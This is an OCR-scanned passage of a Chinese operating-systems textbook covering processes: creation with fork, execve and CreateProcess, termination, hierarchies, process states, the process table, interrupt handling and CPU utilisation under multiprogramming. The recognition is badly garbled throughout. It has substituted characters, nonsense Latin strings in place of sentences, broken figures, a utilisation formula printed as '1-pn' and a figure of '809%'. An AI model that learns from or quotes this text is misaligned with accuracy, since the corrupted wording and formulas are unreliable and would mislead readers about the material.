拟 CPU。 当 然 ， 实 际 上 真正 的 CPU 在 各 进程 之 间 来 回 切换 。 但 为 了 理 
解 这 种 系统 ， 考 虑 在 〈 伪 ) 并 行情 况 下 运行 的 进程 集 ， 要 比 我 们 试图 
跟踪 CPU 如 何在 程序 间 来 回 切换 简单 得 多 。 正 如 在 第 1 章 所 看 到 的 ， 这 
种 快速 的 切换 称 作 多 道 程序 设计 。 


在 图 2-1a 中 我 们 看 到 ， 在 一 台 多 道 程序 计算 机 的 内 存 中 有 4 道 程 
序 。 在 图 2-1b 中 ， 这 4 道 程序 被 抽象 为 4 个 各 自 拥 有 上 自己 控制 流程 〈《 即 每 
个 程序 自己 的 逻辑 程序 计数 器 ) 的 进程 ， 并 且 每 个 程序 都 独立 地 运 
行 。 当 然 ， 实际 上 只 有 一 个 物理 程序 计数 器 ， 所 以 在 每 个 程序 运行 
时 ， 它 的 逻辑 程序 计数 器 被 狼 入 实际 的 程序 计数 器 中 。 当 该 程序 执行 
结束 (或 暂停 执行 ， 时， 物理 程序 计数 器 被 保存 在 内 存 中 该 进程 的 逻 
辑 程 序 计 数 器 中 。 在 图 2-1c 中 我 们 看 到 ， 在 观察 足够 长 的 一 段 时 间 后 ， 
所 有 的 进程 都 运行 了 ， 但 在 任何 一 个 给 定 的 瞬间 仪 有 一 个 进程 真正 在 


运行 。 


个 程序 计数 器 


四 个 程序 计数 器 
时 间 一 ~ 
b) ; 


Al 2-1 a 含 有 4 道 程序 的 多 道 程 序 ，b)4 个 独立 的 顺序 进程 的 概念 模 
型 ，o) 在 任意 时 刻 仅 有 一 个 程序 是 活跃 的 


在 本 章 ， 我 们 假设 只 有 一 个 CPU。 然 而 ， 逐 渐 这 个 假设 就 不 为 真 
了 ， 因 为 新 的 必 片 经 常 是 多 核 的 ， 包 含 2 个 、4 个 或 更 多 的 CPU。 我 们 
将 会 在 第 8 章 介绍 多 核心 片 以 及 多 处 理 器 ， 但 是 在 现在 ， 一 次 只 考虑 
个 CPU 会 更 简单 一 些 。 因 此 ， 当 我 们 说 一 个 CPU 只 能 真正 一 次 运行 一 
个 进程 的 上 时候， 即使 有 2 个 核 (或 CPU) ， 每 一 个 核 也 只 能 一 次 运行 一 
个 进程 。 


由 于 CPU 在 各 进程 之 间 来 回 快速 切换 ， 所 以 每 个 进程 执行 其 运算 
的 速度 是 不 确定 的 。 而 且 当 同一 进程 再 次 运行 时 ， 其 运算 速度 通常 也 
不 可 再 现 。 所 以 ， 在 对 进程 编程 时 决 不 能 对 时 序 做 任何 确定 的 假设 。 
例如 ， 考 虑 一 个 WO 进程 ， 它 用 流 式 磁 市 机 恢复 备份 的 文件 ， 它 执行 一 
个 10 000 次 的 空 循 环 以 等 待 磁带 机 达到 正常 速度 ， 然 后 发 出 命令 读 取 第 
一 个 记录 。 如 采 CPU 决 定 在 空 循环 期 间 切 换 到 其 他 进程 ， 则 磁 市 机 进 
程 可 能 在 第 一 条 记录 通过 磁头 之 后 还 未 被 再 次 运行 。 当 一 个 进程 具有 
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生 。 然 而 ， 通 常 大 多 数 进 程 并 不 受 CPU 多 道 程序 设计 或 其 他 进程 相对 
速度 的 影响 。 


进程 和 程序 间 的 区 别 是 很 微妙 的 ， 但 非常 重要 。 用 一 个 比喻 可 以 
使 我 们 更 容易 理解 这 一 点 。 想 象 一 位 有 一 手 好 厨 乞 的 计算 机 科学 家 正 
在 为 他 的 女儿 烘 制 生 日 蛋 灯 。 他 有 做 生日 蛋糕 的 食谱 ， 厨 房 里 有 所 需 
的 原料 ， 面 粉 、 鸡 蛋 、 糖 、 香 草 汁 等 。 在 这 个 比喻 中 ， 做 和 蛋糕 的 食谱 
就 是 程序 ( 即 用 适当 形式 描述 的 算法 ) ， 计 算 机 科学 家 就 是 处 理 器 
(CPU) ， 而 做 蛋糕 的 各 种 原料 就 是 输入 数据 。 进 程 就 是 厨师 阅读 食 
详 、 取 来 各 种 原料 以 及 烘 制 蝇 糕 等 一 系列 动作 的 总 和 。 


现在 假设 计算 机 科学 家 的 儿子 活着 跑 了 进来 ， 说 他 的 头 被 一 只 蜜 
蜂 丈 了 。 计 算 机 科学 家 就 记录 下 他 照 着 食谱 做 到 哪儿 了 (保存 进程 的 
当前 状态 ) ， 然 后 拿 出 一 本 急救 手册 ， 按 照 其 中 的 指示 处 理 孝 伤 。 这 
里 ， 我 们 看 到 处 理 机 从 一 个 进程 (做 蛋糕 ) 切换 到 另 一 个 高 优先 级 的 
进程 (实施 医疗 救治 ) ， 每 个 进程 拥有 各 自 的 程序 (食谱 和 急救 手 
Wt) 。 当 蜜蜂 歼 伤 处 理 完 之 后 ， 这 位 计算 机 科学 家 又 回来 做 蛋 灯 ， 从 
他 离开 时 的 那 一 步 继 续 做 下 去 。 


这 里 的 关键 思想 是 ， 一 个 进程 是 某 种 类 型 的 一 个 活动 ， 它 有 程 
序 、 输 入 、 输 出 以 及 状态 。 单 个 处 理 器 可 以 被 若干 进程 共享 ， 它 使 用 


某 种 调度 算法 决定 何 时 停止 一 个 进程 的 工作 ， 并 转 而 为 另 一 个 进程 提 


供 服务 。 


2.1.2 ”创建 进程 


操作 系统 需要 有 一 种 方式 来 创建 进程 。 一 些 非常 答 单 的 系统 ， 即 
那 种 只 为 运行 一 个 应 用 程序 设计 的 系统 (例如 ， 微 波 炉 中 的 控制 
an) ， 可 能 在 系统 局 动 之 时 ， 以 后 所 需要 的 所 有 进程 都 已 存在 。 然 而 
在 通用 系统 中 ， 需 要 有 某 种 方法 在 运行 时 按 需 要 创建 或 撤销 进程 。 我 


们 现在 开始 考察 这 个 问题 。 


有 4 种 主要 事件 导致 进程 的 创建 : 


1) 系 统 初始 化 。 


2) 执 行 了 正在 运行 的 进程 所 调用 的 进程 创建 系统 调用 。 
3) 用 户 请 求 创建 一 个 新 进程 。 


4) 一 个 批 处 理 作业 的 初始 化 。 


局 动 操 作 系统 时 ， 通 种 会 创建 在 干 个 进程 。 其 中 有 些 羡 前台 进 
程 ， 也 就 是 同 用 户 AXR) 交互 并 且 替 他 们 完成 工作 的 那些 进程 。 其 
他 的 是 后 台 进 程 ， 这 些 进程 与 特定 的 用 户 没 有 关系 ， 相 反 ， 却 具有 茶 
些 专门 的 功能 。 例 如 ， 设 计 一 个 后 人 台 进 程 来 接收 发 来 的 电子 邮件 ， 这 
个 进程 在 一 天 的 大 部 分 时 间 都 在 睡眠 ， 但 是 当 电子 邮件 到 达 时 束 突 然 


被 唤醒 了 。 也 可 以 设计 另 一 个 后 人 台 进 程 来 接收 对 该 机 姻 中 Web 页 面 的 
访问 请 求 ， 在 请 求 到 达 时 唤醒 该 进程 以 便服 务 该 请 求 。 停 留 在 后 台 处 
理 诸如 电子 邮件 、Web 页 面 、 新 闻 、 打 印 之 类 活动 的 进程 称 为 守护 进 
程 (daemon) 。 在 大 型 系统 中 通常 有 很 多 守护 进程 。 在 UNIX 中 ， 可 
以 用 ps 程序 列 出 正在 运行 的 进程 ， 在 Windows 中 ， 可 使 用 任务 管理 


BH 


ay ° 


除了 在 局 动 阶段 创建 进程 之 外 ， 痢 的 进程 也 可 以 以 后 创建 。 一 个 
正在 运行 的 进程 经 营 发 出 系统 调用 ， 以 便 创 建 一 个 或 多 个 新 进程 协助 
其 工作 。 在 所 要 从 事 的 工作 可 以 容易 地 划分 成 看 干 相关 的 但 没有 相互 
作用 的 进程 时 ， 创 建新 的 进程 束 特 别 有 效 采 。 例 如 ， 如 采 有 大 量 的 数 
据 要 通过 网 络 调 取 并 进行 顺序 处 理 ， 那 么 创建 一 个 进程 取 数 据 ， 并 把 
数据 放 入 共享 缓冲 区 中 ， 而 让 第 二 个 进程 取 走 数据 项 并 人 处理 之 ， 应 该 
比较 容易 。 在 多 处 理 机 中 ， 让 每 个 进程 在 不 同 的 CPU 上 运行 会 使 整个 
作业 运行 得 更 快 。 


在 交互 式 系统 中 ， 键 入 一 个 命令 或 者 点 OO 击 一 个 图 标 就 可 以 
启动 一 个 程序 。 这 两 个 动作 中 的 任何 一 个 都 会 开始 一 个 新 的 进程 ， 并 
在 其 中 运行 所 选择 的 程序 。 在 基于 命令 行 的 UNIX 系 统 中 运行 程序 X， 
新 的 进程 会 从 该 进程 接管 开启 它 的 窗口 。 在 Microsoft Windows 中 ， 多 
数 情形 都 是 这 样 的 ， 在 一 个 进程 开始 时 ， 它 并 没有 窗口 ， 但 是 它 可 以 
创建 一 个 (或 多 个 ) 窗口 。 在 UNIX 和 Windows 系 统 中 ， 用 户 可 以 同时 


打开 多 个 窗口 ， 每 个 窗口 都 运行 一 个 进程 。 通 过 鼠标 用 户 可 以 选择 一 
个 窗口 并 且 与 该 进程 交互 ， 例 如 ， 在 需要 时 提供 输入 。 


最 后 一 种 创建 进程 的 情形 仅 在 大 型 机 的 批 处 理 系统 中 应 用 。 用 户 
在 这 种 系统 中 〈 可 能 是 远程 地 ) 提交 批 处 理 作 业 。 在 操作 系统 认为 有 
资源 可 运行 男 一 个 作业 时 ， 它 创建 一 个 新 的 进程 ， 并 运行 其 输入 队列 
中 的 下 一 个 作业 。 


从 技术 上 看 ， 在 所 有 这 些 情 形 中 ， 痢 进程 都 是 由 于 一 个 已 存在 的 
进程 执行 了 一 个 用 于 创建 进程 的 系统 调用 而 创建 的 。 这 个 进程 可 以 是 
一 个 运行 的 用 户 进程 、 一 个 由 键盘 或 鼠标 局 动 的 系统 进程 或 者 一 个 批 
处 理 管理 进程 。 这 个 进程 所 做 的 工作 是 ， 执 行 一 个 用 来 创建 新 进程 的 
系统 调用 。 这 个 系统 调用 通知 操作 系统 创建 一 个 新 进程 ， 并 且 直 接 或 
间接 地 指定 在 该 进程 中 运行 的 程序 。 


在 UNIX 系 统 中 ， 只 有 一 个 系统 调用 可 以 用 来 创建 新 进程 :fork 。 
这 个 系统 调用 会 创建 一 个 与 调用 进程 相同 的 副本 。 在 调用 了 fork 后 ， 
这 两 个 进程 〈 父 进程 和 子 进程 ) 拥有 相同 的 存储 映像 、 同 样 的 环境 字 
符 串 和 同样 的 打开 文件 。 这 就 古 全 部 情形 。 通 第 ， 子 进程 接着 执行 
execve 或 一 个 类 似 的 系统 调用 ， 以 修改 其 存储 映像 并 运行 一 个 新 的 程 
序 。 例 如 ， 当 一 个 用 户 在 shell 中 键入 命令 sort 时 ，shell 束 创建 一 个 子 进 
程 ， 然后， 这 个 子 进程 执行 sort。 之 所 以 要 安排 两 步 建 并 进程 ， 是 为 了 


在 fork 之 后 但 在 execve 之 前 允许 该 子 进程 处 理 其 文件 描述 符 ， 这 样 可 以 
完成 对 标准 输入 、 标 准 输 出 和 标准 出 错 的 重 定 问 。 


在 Windows 中 ， 人 情形 正 相 反 ， 一 个 win32 函 数 调用 CreateProcess 既 
处 理 进程 的 创建 ， 也 负责 把 正确 的 程序 装 入 新 的 进程 。 该 调用 有 10 个 
参数 ， 其 中 包括 要 执行 的 程序 、 输 入 给 该 程序 的 命令 行 参数 、 各 种 安 
全 属性 、 有 关 打 开 的 文件 是 否 继承 的 控制 位 、 优 移 级 信息 、 为 该 进程 
EAE) 所 需要 创建 的 窗口 规格 以 及 指 问 一 个 结构 的 指针 ， 在 该 
结构 中 新 创建 进程 的 信息 被 返回 给 调用 者 。 除 了 CreateProcess，Win32 
中 有 大 约 100 个 其 他 的 函数 用 于 处 理 进 程 的 管理 、 同 步 以 及 相关 的 事 


务 。 


在 UNIX 和 Windows 中 ， 进 程 创建 之 后 ， 父 进程 和 子 进程 有 各 上 自 不 
同 的 地 址 空间 。 如 果 其 中 某 个 进程 在 其 地 址 空间 中 修改 了 一 个 字 ， 这 
个 修改 对 其 他 进程 而 言 是 不 可 见 的 。 在 UNIX 中 ， 子 进程 的 初始 地 址 空 
间 是 父 进程 的 一 个 副本 ， 但 是 这 里 涉及 两 个 不 同 的 地 址 空间 ， 不 可 写 
的 内 存 区 是 共享 的 〈 某 些 UNIX 的 实现 使 程序 正文 在 两 者 间 共 享 ， 因 为 

不 能 被 修改 ) 。 但 是 ， 对 于 一 个 新 创建 的 进程 而 言 ， 确 实 有 可 能 共 
享 其 创建 者 的 其 他 资源 ， 诸 如 打开 的 文件 等 。 在 Windows 中 ， 从 一 开 
父 进程 的 地 址 空间 和 子 进程 的 地 址 空间 就 是 不 同 的 。 


= 
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2.1.3 ”进程 的 终止 


进程 在 创建 之 后 ， 它 开始 运行 ， 完 成 其 工作 。 但 永恒 是 不 存在 
的 ， 进 程 也 一 样 。 述 早 这 个 新 的 进程 会 终止 ， 通 肖 由 下 列 条 件 引 起 : 


1) 正 常 退出 (自愿 的 ) ° 


2) 出 错 退 出 (自愿 的 ) 。 


3) 闫 重 错误 〈 非 自愿 ) 。 
4) 被 其 他 进程 杀 死 〈 非 自愿 ) 。 


多 数 进程 是 由 于 完成 了 它们 的 工作 而 终止 。 当 编译 器 完成 了 所 给 
定 程序 的 编译 之 后 ， 编 译 器 执行 一 个 系统 调用 ， 通 知 操作 系统 它 的 工 
作 已 经 完成 。 在 UNIX 中 该 调用 是 exit， 而 在 Windows 中 ， 相 关 的 调用 
是 ExitProcess。 面 向 屏幕 的 程序 也 支持 自愿 终止 。 字 处 理 软 件 、 
Internet 浏 览 器 和 类 似 的 程序 中 总 有 一 个 供用 户 点 击 的 图 标 或 荣 单项 ， 
用 来 通知 进程 删除 它 所 打开 的 任何 临时 文件 ， 然 后 终止 。 


进程 终止 的 第 二 个 原因 是 进程 发 现 了 严重 错误 。 例 如 ， 如 果 用 户 
键入 命令 


cc foo.c 


Bea ERE FF foo.c, (He, Peat eee Bi o 
TAE SHIRE RAY, E RAR 2C SCO IF o TAIZ, 
这 些 程序 会 弹出 一 个 对 话 框 ， 并 要 求 用 户 再 试 一 次 。 


进程 终止 的 第 三 个 原因 是 由 进程 引起 的 错误 ， 通 滑 征 由 于 程序 中 
的 错误 所 致 。 例 如 ， 执 行 了 一 条 非法 指令 、 引 用 不 存在 的 内 存 ， 或 除 
数 是 零 等 。 有 些 系统 中 (如 UNIX) ， 进 程 可 以 通知 操作 系统 ， 它 硕 望 
自行 处 理 某 些 类 型 的 错误 ， 在 这 类 错误 中 ， 进 程 会 收 到 信号 (被 中 
断 ) ， 而 不 是 在 这 类 错误 出 现时 终止 。 


第 四 种 终止 进程 的 原因 是 ， 某 个 进程 执行 一 个 系统 调用 通知 操作 
系统 杀 死 某 个 其 他 进程 。 在 UNIX 中 ， 这 个 系统 调用 是 kill。 在 Win32 中 
对 应 的 函数 是 TerminateProcess。 在 这 两 种 情形 中 , “杀手 ”都 必须 获得 
确定 的 授权 以 便 进 行动 作 。 在 有 些 系统 中 ， 当 一 个 进程 终止 时 ， 不 论 
是 自愿 的 还 是 其 他 原因 ， 由 该 进程 所 创建 的 所 有 进程 也 一 律 立即 被 杀 
死 。 不 过 ，UNIX 和 Windows 都 不 是 这 种 工作 方式 。 


2.1.4 ”进程 的 层次 结构 


某 些 系统 中 ， 当 进程 创建 了 男 一 个 进程 后 ， 父 进程 和 子 进程 束 以 
某 种 形式 继续 保持 关联 。 子 进程 目 身 可 以 创建 更 多 的 进程 ， 组 成 一 个 
进程 的 层次 结构 。 请 注意 ， 这 与 植物 和 动物 的 有 性 繁殖 不 同 ， 进 程 只 
有 一 个 父 进程 〈 但 是 可 以 有 零 个 、 一 个 、 两 个 或 多 个 子 进程 ) 。 


在 UNIX 中 ， 进 程 和 它 的 所 有 子女 以 及 后 裔 共同 组 成 一 个 进程 组 。 
当 用 户 从 键盘 发 出 一 个 信号 时 ， 该 信号 被 送 给 当前 与 键 到 相关 的 进程 
组 中 的 所 有 成 员 (它们 通常 是 在 当前 窗口 创建 的 所 有 活动 进程 。 
个 进程 可 以 分 别 捕获 该 信号 、 忽 上 略 该 信号 或 采取 默认 的 动作 ， 即 被 该 


信号 杀 死 。 


这 里 有 男 一 个 例子 ， 可 以 用 来 说 明 进程 层次 的 作用 ， 考 虑 UNIX 在 
启动 时 如 何 初始 化 自己 。 一 个 称 为 init 的 特殊 进程 出 现在 启动 映像 中 。 
当 它 开始 运行 时 ， 读 入 一 个 说 明 终 冲 数量 的 文件 。 接 着 ， 为 每 个 终端 
创建 一 个 新 进程 。 这 些 进程 等 得 用 户 登 录 。 如 采 有 一 个 用 户 登 录 成 
功 ， 该 登录 进程 就 执行 一 个 shell; 储 备 接收 命令 。 所 接收 的 这 些 命令 会 
局 动 更 多 的 进程 ， 以 此 类 推 。 这 样 ， 在 整个 系统 中 ， 所 有 的 进程 都 属 
于 以 init 为 根 的 一 柠 树 。 


相反 ，Windows 中 没有 进程 层次 的 概念 ， 所 有 的 进程 都 是 地 位 相 
同 的 。 惟 一 类 似 于 进程 层次 的 暗示 是 在 创建 进程 的 时 候 ， 父 进程 得 到 
一 个 特别 的 令 牌 〈《 称 为 句柄 ) ， 该 句柄 可 以 用 来 控制 子 进 程 。 但 是 ， 
它 有 权 把 这 个 令 牌 传送 给 某 个 其 他 进程 ， 这 样本 不 存在 进程 层次 了 。 
在 UNIX 中 ， 进 程 可 不 能 剥夺 其 子女 的 “继承 权 ”。 


2.1.5 “进程 的 状态 


尽管 每 个 进程 是 一 个 独立 的 实体 ， 有 其 自己 的 程序 计数 器 和 内 部 
， 但 进程 之 间 经 常 需要 相互 作用 。 一 个 进程 的 输出 结果 可 能 作为 
个 进程 的 输入 。 在 shell 命 令 


cat chapter1 chapter2 chapter3|grep tree 


中 ， 第 一 个 进程 运行 cat， 将 三 个 文件 连接 并 输出 。 第 二 个 进程 运 
行 grep， 它 从 输入 中 选择 所 有 包含 单词 “tree” 的 那些 行 。 根 据 这 两 个 进 
程 的 相对 速度 (这 取决 于 这 两 个 程序 的 相对 复杂 度 和 各 自 所 分 配 到 的 
CPU 时 间 ) ， 可 能 发 生 这 种 情况 ，grep 准 备 就 绪 可 以 运行 ， 但 输入 还 没 
有 完成 。 于 是 必须 阻塞 grep， 直 到 输入 到 来 。 


当 一 个 进程 在 逻辑 上 不 能 继续 运行 时 ， 它 束 会 被 阻 讲 ， 典 型 的 例 
子 是 它 在 等 竺 可 以 使 用 的 输入 。 还 可 能 有 这 样 的 情况 : 一 个 概念 上 能 
够 运行 的 进程 被 迫 停止 ， 因 为 操作 系统 调度 男 一 个 进程 占用 了 CPU e 
这 两 种 情况 是 完全 不 同 的 。 在 第 一 种 情况 下 ， 进 程 挂 起 是 程序 自身 国 
有 的 原因 (在 键入 用 户 命令 行 之 前 ， 无 法 执行 命令 ) 。 第 二 种 情况 则 
是 由 系统 技术 上 的 原因 引起 的 (由 于 没有 足够 的 CPU， 所 以 不 能 使 每 
个 进程 都 有 一 人 台 它 私 用 的 处 理 絮 ) 。 在 图 2-2 中 可 以 看 到 显示 进程 的 三 
种 状态 的 状态 图 。 这 三 种 状态 


1) 运 行 态 (该 时 刻 进程 实际 占用 CPU) 。 


2) 就 绪 态 〈 可 运行 ， 但 因为 其 他 进程 正在 运行 而 暂时 停止 ) 。 


DES (除非 某 种 外 部 事件 发 生 ， 否 则 进程 不 能 运行 ) 。 


前 两 种 状态 在 逻辑 上 是 类 似 的。 处 于 这 两 种 状态 的 进程 部 可 以 运 
行 ， 只 是 对 于 第 二 种 状态 暂时 没有 CPU 分 配给 它 。 第 三 种 状态 与 前 两 
种 状态 不 同 ， 处 于 该 状态 的 进程 不 能 运行 ， 即 使 CPU 空 内 也 不 行 。 


进程 的 三 种 状态 之 间 有 四 种 可 能 的 转换 关系 ， 如 图 2-2 所 示 。 在 操 
作 系 统 发 现 进程 不 能 继续 运行 下 去 时 ， 发 生 转 换 1。 在 某 些 系统 中 ， 进 
程 可 以 执行 一 个 诸如 pause 的 系统 调用 来 进入 阻塞 状态 。 在 其 他 系统 
中 ， 包 括 UNIX， 当 一 个 进程 从 管道 或 设备 文件 (例如 终端 ) 读 取 数 据 
时 ， 如 条 没有 有 效 的 输入 存在 ， 则 进程 会 被 目 动 阻塞 。 


.进程 为 等 行 输入 而 阻塞 
调度 程序 选择 另 一 个 进程 
. 调度 程序 选择 这 个 进程 

4. 出 现 有 效 输入 


WN = 
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态 之 间 的 转换 


转换 2 和 3 是 由 进程 调度 程序 引起 的 ， 进 程 调度 程序 是 操作 系统 的 
一 部 分 ， 进 程 甚至 感觉 不 到 调度 程序 的 存在 。 系 统 认 为 一 个 运行 进程 
占用 处 理 器 的 时 间 已 经 过 长 ， 决 定 让 其 他 进程 使 用 CPU 时 间 时 ， 会 发 
生 转 换 2。 在 系统 已 经 让 所 有 其 他 进程 享有 了 它们 应 有 的 公平 待遇 而 重 
新 轮 到 第 一 个 进程 再 次 占用 CPU 运行 时 ， 会 发 生 转换 3。 调 度 程 序 的 主 
要 工作 束 是 决定 应 当 运 行 哪个 进程 、 何 时 运行 及 它 应 该 运行 多 长 时 
间 ， 这 是 很 重要 的 一 点 ， 我 们 将 在 本 章 的 后 面部 分 进行 讨论 。 已 经 提 
出 了 许多 算法 ， 这 些 算法 力图 在 整体 效率 和 进程 的 苋 争 公平 性 之 间 取 
得 平衡 。 我 们 将 在 本 半 稍 后 部 分 研究 其 中 的 一 些 问 题 。 


当 进 程 等 待 的 一 个 外 部 事件 发 生 时 (如 一 些 输入 到 达 ) ， 则 发 生 
转换 4。 如 采 此 时 没有 其 他 进程 运行 ， 则 立即 触发 转换 3， 该 进程 便 开 
9 运行 。 否 则 该 进程 将 处 于 束 绪 人 态 ， 等 待 CPU 空 几 并 且 轮 到 它 运行 。 


使 用 进程 模型 使 得 我 们 易于 想象 系统 内 部 的 操作 状况 。 一 些 进程 
正在 运行 执行 用 户 键入 命令 所 对 应 的 程序 。 另 一 些 进程 是 系统 的 一 部 
分 ， 它 们 的 任务 是 完成 下 列 一 些 工 作 : 比如， 执行 文件 服务 请 求 、 管 
理 磁盘 驳 动 贷 和 磁 市 机 的 运行 细 世 等 。 当 发 生 一 个 磁盘 中 断 时 ， 系 统 
会 做 出 决定 ， 停 止 运行 当前 进程 ， 转 而 运行 磁 强 进程 ， 该 进程 在 此 之 
前 因 等 竺 中 断 而 处 于 阻塞 仿 。 这 样 ， 我 们 束 可 以 不 再 考虑 中 断 ， 而 只 
征 考 虑 用 户 进 程 、 伍 强 进程 、 终 端 进程 等 。 这 些 进程 在 等 生 时 总 是 处 


FRAZER ° FEE ANEAFI, SRP ETN EB 
除 阻塞 ， 并 成 为 可 调度 运行 的 进程 。 


从 这 个 观点 引出 了 图 2-3 所 示 的 模型 。 在 图 2-3 中 ， 操 a 作 系统 的 最 捅 
层 是 调度 程序 ， 在 它 上 面 有 许多 进程 。 所 有 关于 中 断 处 理 、 启 动 进程 
和 停止 进程 的 具体 细 市 都 隐藏 在 调度 程序 中 。 实 际 上 ， 调 度 程序 是 一 
段 非常 短小 的 程序 。 操 作 系 统 的 其 他 部 分 被 简 单 地 组 织 成 进程 的 形 
式 。 不 过 ， 很 少 有 真实 的 系统 是 以 这 样 的 理想 方式 构造 的 。 


图 2-3 ”以 进程 构造 的 操作 系统 最 底层 处 理 中 断 和 调度 ， 在 该 层 之 上 
是 顺序 进程 


2.1.6 进程 的 实现 


为 了 实现 进程 模型 ， 操 作 系统 维护 着 一 张 表格 (一 个 结构 数 
组 ) ， 即 进程 表 (process table) 。 每 个 进程 占用 一 个 进程 表 项 。 (有 
些 作者 称 这 些 表 项 为 进程 控制 块 。) 该 表 项 包含 了 进程 状态 的 重要 信 
息 ， 包 括 程 序 计数 器 、 堆 栈 指针 、 内 存 分 配 状 况 、 所 打开 文件 的 状 
态 、 账 号 和 调度 信息 ， 以 及 其 他 在 进程 由 运行 态 转换 到 就 绪 态 或 阻塞 
态 时 必须 保存 的 信息 ， 从 而 保证 该 进程 随后 能 再 次 局 动 ， 就 像 从 未 被 
中 断 过 一 样 。 


图 2-4 中 展示 了 在 一 个 典型 系统 中 的 关键 字段 。 第 一 列 中 的 字段 与 
进程 管理 有 关 。 其 他 两 列 分 别 与 存储 管理 和 文件 管理 有 关 。 应 该 注意 
到 进程 表 中 的 字段 是 与 系统 密切 相关 的 ， 不 过 该 图 给 出 了 所 需要 信息 
ABUT ° 


| 进程 管理 
寄存 器 
| 程序 计数 器 


存储 管理 
正文 段 指针 
数据 段 指针 


RHR O 
工作 目录 


EP ARAS 堆栈 段 指针 


| 文件 描述 符 
堆栈 指针 用 户 ID 
进程 状态 组 ID 
优先 级 
调度 参数 


进程 开始 时 间 
使 用 的 CPU 时 间 
子 进 程 的 CPU 时 间 
下 次 报警 时 间 


图 2-4 典型 的 进程 表 表 项 中 的 一 些 字 段 


在 了 解 进 程 表 后 ， 就 可 以 对 在 单个 (或 每 一 个 ) CPU 上 如 何 维持 
多 个 顺序 进程 的 错觉 做 更 多 的 阐述 。 与 每 一 VO 类 关联 的 是 一 个 称 作 中 
断 问 量 (interrupt vector) 的 位 置 (靠近 内 存 底 部 的 固定 区 域 ) 。 它 包 
舍 中 断 服务 程序 的 入 口 地 址 。 假 设 当 一 个 磁盘 中 断 发 生 时 ， 用 户 进程 3 
正在 运行 ， 则 中 断 硬 件 将 程序 计数 器 、 程 序 状态 字 ， 有 时 还 有 一 个 或 
多 个 寄存 器 压 入 堆栈 ， 计 算 机 随即 跳 转 到 中 断 癌 量 所 指示 的 地 址 。 
些 是 硬件 完成 的 所 有 操作 ， 然 后 软件 ， 特 别 是 中 断 服务 例 程 束 接管 一 
切 剩余 的 工作 。 


所 有 的 中 断 都 从 保存 寄存 器 开始 ， 对 于 当前 进程 而 言 ， 通 冲 是 在 
进程 表 项 中 。 随 后 ， 会 从 堆栈 中 删除 由 中 断 便 件 机 制 存 入 堆栈 的 那 部 
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分 信息 ， 并 将 堆栈 指针 指向 一 个 由 进程 处 理 程 序 所 使 用 的 临时 堆栈 。 
一 些 诸如 保存 寄存 器 值 和 设置 堆栈 指针 等 操作 ， 无 法 用 C 语 言 这 一 类 高 
级 语言 朱 述 ， 所 以 这 些 操作 通过 一 个 短小 的 汇编 语言 例 程 来 完成 ， 通 
党 该 例 程 可 以 供 所 有 的 中 断 使 用 ， 因 为 无 论 中 断 是 怎样 引起 的 ， 有 关 
保存 寄存 胡 的 工作 则 古 完 全 一 样 的 。 
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的 工作 。 (假定 操作 系统 由 C 语 言 编写 ， 通 常 这 是 所 有 真实 操作 系统 的 
选择 ) 。 在 完成 有 关 工 作 之 后 ， 大 概 就 会 使 某 些 进程 就 绪 ， 接 着 调用 
调度 程序 ， 决 定 随后 该 运行 哪个 进程 。 随 后 将 控制 转 给 一 段 汇编 语言 
代码 ， 为 当前 的 进程 攻 入 寄存 右 值 以 及 内 存 映 射 并 局 动 该 进程 运行 。 
图 2-5 中 总 结 了 中 断 处 理 和 调度 的 过 程 。 值 得 注意 的 是 ， 各 种 系统 之 间 
某 些 细 世 会 有 所 不 同 。 


. 便 件 压 入 堆栈 程序 计数 器 等 。 
. 便 件 从 中 断 向 量 装 入 新 的 程序 计数 器 。 
. 汇编 语言 过 程 保 存 寄存 器 值 。 
. 汇编 语言 过 程 设 置 新 的 堆栈 。 


.C 中 断 服务 例 程 运 行 ( 典 型 地 读 和 缓冲 输入 )。 
. 调度 程序 决定 下 一 个 将 运行 的 进程 。 

. C 过 程 返回 至 汇编 代码 。 

.汇编 语言 过 程 开始 运行 新 的 当前 进程 。 


图 2-5 中 断 发 生 后 操作 系统 最 的 层 的 工作 步 台 


当 该 进程 结束 时 ， 操 作 系统 显示 一 个 提示 符 并 等 竺 新 的 命令 。 一 


旦 它 接 到 新 命令 ,就 装 入 新 的 程序 进 内 存 ， 和 覆盖 前 一 个 程序 。 


2.1.7 ”多 道 程序 设计 模型 


采用 多 道 程序 设计 可 以 提高 CPU 的 利用 率 。 严 格 地 说 ， 如 果 进 程 
用 于 计算 的 平均 时 间 是 进程 在 内 存 中 停留 时 间 的 20%， 且 内 存 中 同时 有 
5 个 进程 ， 则 CPU 将 一 直 满 负载 运行 。 然 而 ， 这 个 模型 在 现实 中 过 于 乐 
观 ， 因 为 它 假设 这 5 个 进程 不 会 同时 等 竺 TO。 


更 好 的 模型 是 从 概率 的 角度 来 看 CPU 的 利用 率 。 假 设 一 个 进程 等 
竺 MO 操作 的 时 间 与 其 停留 在 内 存 中 时 间 的 比 为 p。 当 内 存 中 同时 有 n 个 
进程 时 ， 则 所 有 n 个 进程 都 在 等 待 WO 〈 此 时 CPU 空转 ) 的 概率 是 pa 。 
CPU 的 利用 率 由 下 面 的 公式 给 出 : 


CPU 利用 率 =1-pn 


图 2-6 以 n 为 变量 的 函数 表示 了 CPU 的 利用 率 ，n 称 为 多 道 程序 设计 
的 道 数 (degree of multiprogramming) ° 


Rete Ate. 


20% I/O 等 待 


100 


80 50% I/O 等 竺 


80% I/O 等 竺 


40 


CPU 利用 率 (%) 


20 


多 道 程 序 设 计 的 道 数 


图 2-6 CPU 利用 率 是 内 存 中 进程 数目 的 函数 


从 图 2-6 中 可 以 清楚 地 看 到 ， 如 果 进 程 伦 费 80% 的 时 间 等 待 HO， 为 
使 CPU 的 浪费 低 于 10%， 至 少 要 有 10 个 进程 同时 在 内 存 中 。 当 读者 认识 
到 一 个 等 待 用 户 从 终端 输入 的 交互 式 进程 是 处 于 IO 等 待 状态 时 ， 那 么 
很 明显 ，809% 甚 至 更 多 的 IO 等 待 时 间 是 普遍 的 。 即 使 是 在 服务 器 中 ， 
做 大 量 磁 盘 IO 操 作 的 进程 也 会 花费 同样 或 更 多 的 等 待 时 间 。 


从 完全 精确 的 角度 考虑 ， 应 该 指出 此 概率 模型 只 是 描述 了 一 个 大 
致 的 状况 。 它 假设 所 有 n 个 进程 是 独立 的 ， 即 内 存 中 的 5 个 进程 中 ，3 个 
运行 ，2 个 等 待 ， 是 完全 可 接受 的 。 但 在 单 CPU 中 ， 不 能 同时 运行 3 个 
